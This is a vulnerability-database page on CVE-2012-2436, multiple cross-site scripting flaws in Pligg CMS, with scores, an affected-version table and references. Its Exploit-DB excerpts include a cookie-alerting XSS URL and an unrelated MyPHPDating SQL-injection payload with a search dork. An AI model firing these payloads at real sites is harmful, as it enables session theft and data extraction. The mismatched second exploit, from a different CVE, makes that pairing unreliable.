CVE-2012-2436
published 2012-05-27CVE-2012-2436: Multiple cross-site scripting (XSS) vulnerabilities in Pligg CMS before 1.2.2 allow remote attackers to inject arbitrary web script or HTML via (1) an…
PriorityP421medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
2.53%
82.9th percentile
Multiple cross-site scripting (XSS) vulnerabilities in Pligg CMS before 1.2.2 allow remote attackers to inject arbitrary web script or HTML via (1) an arbitrary parameter in a move or (2) minimize action to admin/admin_index.php; (3) the karma_username parameter to module.php in the karma module; (4) q_1_low, (5) q_1_high, (6) q_2_low, or (7) q_2_high parameter in a configure action to module.php in the captcha module; or (8) the edit parameter to module.php in the admin_language module.
Affected
16 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pligg | pligg_cms | <= 1.2.1 | — |
| pligg | pligg_cms | — | — |
| pligg | pligg_cms | — | — |
| pligg | pligg_cms | — | — |
| pligg | pligg_cms | — | — |
| pligg | pligg_cms | — | — |
| pligg | pligg_cms | — | — |
| pligg | pligg_cms | — | — |
| pligg | pligg_cms | — | — |
| pligg | pligg_cms | — | — |
| pligg | pligg_cms | — | — |
| pligg | pligg_cms | — | — |
| pligg | pligg_cms | — | — |
| pligg | pligg_cms | — | — |
| pligg | pligg_cms | — | — |
| pligg | pligg_cms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Pligg CMS 1.x - 'module.php' Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2012-05-23
CVE-2012-2436 Pligg CMS 1.x - 'module.php' Multiple Cross-Site Scripting Vulnerabilities
Pligg CMS 1.x - 'module.php' Multiple Cross-Site Scripting Vulnerabilities
---
source: https://www.securityfocus.com/bid/53662/info
Pligg CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Pligg CMS 1.2.2 is vulnerable; other versions may also be affected.
http://www.example.com/module.php?module=captcha&action=configure&captcha=math&q_1_low=%22%3E%3Cs cript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/module.php?module=captcha&action=configure&c
Exploit-DB
MyPHPDating 1.0 - SQL Injection
exploitdb·2012-01-02
CVE-2009-2436 MyPHPDating 1.0 - SQL Injection
MyPHPDating 1.0 - SQL Injection
---
MyPHPDating 1.0 SQL Injection Vulnerability \
==============================================\__________________________
Software : MyPHPDating version 1.0 \
Date : 1/1/2012 \
Vendor : http://www.phponlinedatingsoftware.com/ \
Demo : http://www.phponlinedatingsoftware.com/demo.htm \
Get App. : http://www.phponlinedatingsoftware.com/order.htm \
Price : $149.00 \
Dork : "Powered by MyPHPDating" \
Author : ITTIHACK \
Home : http://ittihack.com \
|_______________________________________|
Vulnerable file : page.php |
Exploit : http://localhost/[path]/page.php?page_id=[SQL] |
http://localhost/[path]/page.php?page_id=-1+union+select+1,2,3,concat(@@version,0x3c3e,database())-- |
===================================================================================
http://forums.pligg.com/downloads.php?do=file&id=15http://pligg.svn.sourceforge.net/viewvc/pligg/trunk/modules/admin_language/admin_language_main.php?r1=2442&r2=2441&pathrev=2442http://pligg.svn.sourceforge.net/viewvc/pligg?view=revision&revision=2440http://pligg.svn.sourceforge.net/viewvc/pligg?view=revision&revision=2441http://pligg.svn.sourceforge.net/viewvc/pligg?view=revision&revision=2452http://secunia.com/advisories/45431http://secunia.com/advisories/49257http://secunia.com/secunia_research/2012-18/http://www.securityfocus.com/bid/53625http://www.securityfocus.com/bid/53662https://exchange.xforce.ibmcloud.com/vulnerabilities/75764https://exchange.xforce.ibmcloud.com/vulnerabilities/75834https://www.htbridge.com/advisory/HTB23089http://forums.pligg.com/downloads.php?do=file&id=15http://pligg.svn.sourceforge.net/viewvc/pligg/trunk/modules/admin_language/admin_language_main.php?r1=2442&r2=2441&pathrev=2442http://pligg.svn.sourceforge.net/viewvc/pligg?view=revision&revision=2440http://pligg.svn.sourceforge.net/viewvc/pligg?view=revision&revision=2441http://pligg.svn.sourceforge.net/viewvc/pligg?view=revision&revision=2452http://secunia.com/advisories/45431http://secunia.com/advisories/49257http://secunia.com/secunia_research/2012-18/http://www.securityfocus.com/bid/53625http://www.securityfocus.com/bid/53662https://exchange.xforce.ibmcloud.com/vulnerabilities/75764https://exchange.xforce.ibmcloud.com/vulnerabilities/75834https://www.htbridge.com/advisory/HTB23089
2012-05-27
Published